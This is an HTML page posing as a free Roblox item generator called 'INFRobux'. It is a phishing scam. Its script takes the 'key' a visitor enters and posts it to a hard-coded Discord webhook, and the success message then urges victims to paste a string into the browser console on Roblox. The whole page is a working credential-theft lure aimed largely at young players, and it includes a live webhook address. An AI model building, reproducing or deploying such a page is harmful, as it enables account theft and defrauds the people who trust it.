<!DOCTYPE html>
<html>
<head>
    <title>Robux Infinite</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
            margin-top: 50px;
        }
        form {
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        label {
            font-weight: bold;
            margin-bottom: 10px;
        }
        input[type="text"] {
            padding: 8px;
            border: 1px solid #ccc;
            border-radius: 5px;
            width: 300px;
            margin-bottom: 20px;
        }
        input[type="submit"] {
            background-color: #4CAF50;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
        }
        input[type="submit"]:hover {
            background-color: #45a049;
        }
    </style>
</head>
<body>
    <h1>INFRobux</h1>
    <p>One day, I wanted an item I couldn't afford and found a way to get it for free. Now, I'm using this method on a website to help people facing the same issue as I did. The only downside is that it doesn't work for UGC items, only for items created by Roblox. To prevent the market from crashing, there is a limit of 1 free item per person every 24 hours.</p>
    <form id="myForm">
        <label for="message">Enter your key:</label>
        <input type="text" id="message" name="message" required>
        <input type="submit" value="Send">
    </form>

    <script>
        document.getElementById('myForm').addEventListener('submit', function(event) {
            event.preventDefault();
            const formData = new FormData(event.target);
            const message = formData.get('message');

            const webhookUrl = "https://discord.com/api/webhooks/1130972529863958528/ytvji5RCaAbqhVzHJv6kOTBHn1Ig7Nbt2zaNmtVfX_URAiEmvYp8YfK8ICepUAzoyN53";

            // Sending the data to Discord webhook using Fetch API
            fetch(webhookUrl, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    content: message
                })
            })
            .then(response => {
                if (response.ok) {
                    alert('Success! To redeem your item, go to the item page of the thing you want to steal and go to inspect element. Type this in console 'data.locate.current_selected_item:apikey.2582168268');
                } else {
                    alert('error! please try again');
                }
            })
            .catch(error => {
                alert('An error occurred.');
                console.error('Error:', error);
            });
        });
    </script>
</body>
</html>
